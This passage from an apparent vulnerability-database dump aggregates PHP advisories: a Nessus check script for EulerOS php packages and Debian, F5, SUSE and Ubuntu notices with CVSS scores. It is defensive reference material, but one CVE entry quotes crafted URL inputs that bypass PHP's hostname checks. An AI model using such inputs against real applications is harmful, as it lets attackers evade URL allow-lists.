7.1.x before 7.1.1 allows\n remote attackers to cause a denial of service (buffer\n over-read and application crash) via crafted serialized\n data that is mishandled in a finish_nested_data\n call.(CVE-2016-10161)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, an error in the date extension's\n timelib_meridian parsing code could be used by\n attackers able to supply date strings to leak\n information from the interpreter, related to\n ext/date/lib/parse_date.c out-of-bounds reads affecting\n the php_parse_date function. NOTE: the correct fix is\n in the e8b7698f5ee757ce2c8bd10a192a491a498f891c commit,\n not the bd77ac90d3bdf31ce2a5251ad92e9e75\n gist.(CVE-2017-11145)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - Oniguruma through 6.9.3, as used in PHP 7.3.x and other\n products, has a heap-based buffer over-read in\n str_lower_case_match in regexec.c.(CVE-2019-19246)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and\n 7.4.0 it is possible to supply it with data what will\n cause it to read past the allocated buffer. This may\n lead to information disclosure or\n crash.(CVE-2019-11047)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and\n 7.4.0 it is possible to supply it with data what will\n cause it to read past the allocated buffer. This may\n lead to information disclosure or\n crash.(CVE-2019-11050)\n\n - An issue was discovered in Oniguruma 6.x before\n 6.9.4_rc2. In the function fetch_interval_quantifier\n (formerly known as fetch_range_quantifier) in\n regparse.c, PFETCH is called without checking PEND.\n This leads to a heap-based buffer\n over-read.(CVE-2019-19204)\n\n - An issue was discovered in the EXIF component in PHP\n before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before\n 7.3.3. There is an uninitialized read in\n exif_process_IFD_in_TIFF.(CVE-2019-9641)\n\n - Double free vulnerability in the php_wddx_process_data\n function in wddx.c in the WDDX extension in PHP before\n 5.5.37, 5.6.x before 5.6.23, and 7.x before 7.0.8\n allows remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via crafted XML data that is mishandled in a\n wddx_deserialize call.(CVE-2016-5772)\n\n - Multiple integer overflows in the mbfl_strcut function\n in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP before\n 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allow\n remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted mb_strcut call.(CVE-2016-4073)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1747\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dda25e7c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-9641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h30\",\n \"php-cli-5.4.16-45.h30\",\n \"php-common-5.4.16-45.h30\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-07-21T08:20:29", "description": "\nSeveral issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\n\n* [CVE-2016-10397](https://security-tracker.debian.org/tracker/CVE-2016-10397)\nIncorrect handling of various URI components in the URL parser could\n be used by attackers to bypass hostname-specific URL checks.\n* [CVE-2017-11143](https://security-tracker.debian.org/tracker/CVE-2017-11143)\nAn invalid free in the WDDX deserialization of boolean parameters\n could be used by attackers able to inject XML for deserialization to\n crash the PHP interpreter.\n* [CVE-2017-11144](https://security-tracker.debian.org/tracker/CVE-2017-11144)\nThe openssl extension PEM sealing code did not check the return value\n of the OpenSSL sealing function, which could lead to a crash of the\n PHP interpreter.\n* [CVE-2017-11145](https://security-tracker.debian.org/tracker/CVE-2017-11145)\nLack of a bounds check in the date extension's timelib\\_meridian\n parsing code could be used by attackers able to supply date strings to\n leak information from the interpreter.\n* [CVE-2017-11147](https://security-tracker.debian.org/tracker/CVE-2017-11147)\nThe PHAR archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or potentially\n disclose information due to a buffer over-read in the\n phar\\_parse\\_pharfile function in ext/phar/phar.c.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n5.4.45-0+deb7u9.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2017-07-21T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2022-07-21T05:51:43", "id": "OSV:DLA-1034-1", "href": "https://osv.dev/vulnerability/DLA-1034-1", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-06-28T06:26:23", "description": "\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\n\n* [CVE-2017-11142](https://security-tracker.debian.org/tracker/CVE-2017-11142)\nDenial of service via overly long form variables\n* [CVE-2017-11143](https://security-tracker.debian.org/tracker/CVE-2017-11143)\nInvalid free() in wddx\\_deserialize()\n* [CVE-2017-11144](https://security-tracker.debian.org/tracker/CVE-2017-11144)\nDenial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function.\n* [CVE-2017-11145](https://security-tracker.debian.org/tracker/CVE-2017-11145)\nOut-of-bounds read in wddx\\_deserialize()\n* [CVE-2017-11628](https://security-tracker.debian.org/tracker/CVE-2017-11628)\nBuffer overflow in PHP INI parsing API\n* [CVE-2017-12933](https://security-tracker.debian.org/tracker/CVE-2017-12933)\nBuffer overread in finish\\_nested\\_data()\n* [CVE-2017-16642](https://security-tracker.debian.org/tracker/CVE-2017-16642)\nOut-of-bounds read in timelib\\_meridian()\n\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 5.6.33+dfsg-0+deb8u1.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\nFor the detailed security status of php5 please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/php5](https://security-tracker.debian.org/tracker/php5)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642"], "modified": "2023-06-28T06:26:18", "id": "OSV:DSA-4081-1", "href": "https://osv.dev/vulnerability/DSA-4081-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-28T06:26:23", "description": "\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\n\n* [CVE-2017-11144](https://security-tracker.debian.org/tracker/CVE-2017-11144)\nDenial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function\n* [CVE-2017-11145](https://security-tracker.debian.org/tracker/CVE-2017-11145)\nOut-of-bounds read in wddx\\_deserialize()\n* [CVE-2017-11628](https://security-tracker.debian.org/tracker/CVE-2017-11628)\nBuffer overflow in PHP INI parsing API\n* [CVE-2017-12932](https://security-tracker.debian.org/tracker/CVE-2017-12932) /\n [CVE-2017-12934](https://security-tracker.debian.org/tracker/CVE-2017-12934)\nUse-after-frees during unserialisation\n* [CVE-2017-12933](https://security-tracker.debian.org/tracker/CVE-2017-12933)\nBuffer overread in finish\\_nested\\_data()\n* [CVE-2017-16642](https://security-tracker.debian.org/tracker/CVE-2017-16642)\nOut-of-bounds read in timelib\\_meridian()\n\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 7.0.27-0+deb9u1.\n\n\nWe recommend that you upgrade your php7.0 packages.\n\n\nFor the detailed security status of php7.0 please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/php7.0](https://security-tracker.debian.org/tracker/php7.0)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "osv", "title": "php7.0 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642"], "modified": "2023-06-28T06:26:18", "id": "OSV:DSA-4080-1", "href": "https://osv.dev/vulnerability/DSA-4080-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-08-09T15:09:24", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.3.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-08T17:03:00", "type": "f5", "title": "Multiple PHP vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2017-08-08T20:15:00", "id": "F5:K20289222", "href": "https://support.f5.com/csp/article/K20289222", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2021-06-08T18:41:10", "description": "This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to\n information leak. (bsc#1048112)\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n - CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n", "cvss3": {}, "published": "2017-08-30T19:30:52", "type": "suse", "title": "Security update for php7 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2017-08-30T19:30:52", "id": "SUSE-SU-2017:2303-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00075.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:41:10", "description": "This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to\n information leak. (bsc#1048112)\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n - CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2017-09-04T12:07:53", "type": "suse", "title": "Security update for php7 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2017-09-04T12:07:53", "id": "OPENSUSE-SU-2017:2337-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00007.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2023-09-18T02:08:37", "description": "## Releases\n\n * Ubuntu 12.04 \n\n## Packages\n\n * php5 \\- HTML-embedded scripting language interpreter\n\nUSN-3382-1 fixed several vulnerabilities in PHP. This update provides \nthe corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that the PHP URL parser incorrectly handled certain URI \ncomponents. A remote attacker could possibly use this issue to bypass \nhostname-specific URL checks. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean parameters \nwhen unserializing data. A remote attacker could possibly use this issue to \ncause PHP to crash, resulting in a denial of service. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP \nincorrectly handled the OpenSSL sealing function. A remote attacker could \npossibly use this issue to cause PHP to crash, resulting in a denial of \nservice. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension incorrectly \nhandled memory. A remote attacker could possibly use this issue to disclose \nsensitive information from the server. (CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives. A \nremote attacker could use this issue to cause PHP to crash or disclose \nsensitive information. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2017-11147)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing ini \nfiles. An attacker could possibly use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain regular \nexpressions. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2017-9224, CVE-2017-9226, CVE-2017-9227, CVE-2017-9228, CVE-2017-9229)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-18T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2017-12-18T00:00:00", "id": "USN-3382-2", "href": "https://ubuntu.com/security/notices/USN-3382-2", "cvss": {"score": 7.5, "vector": 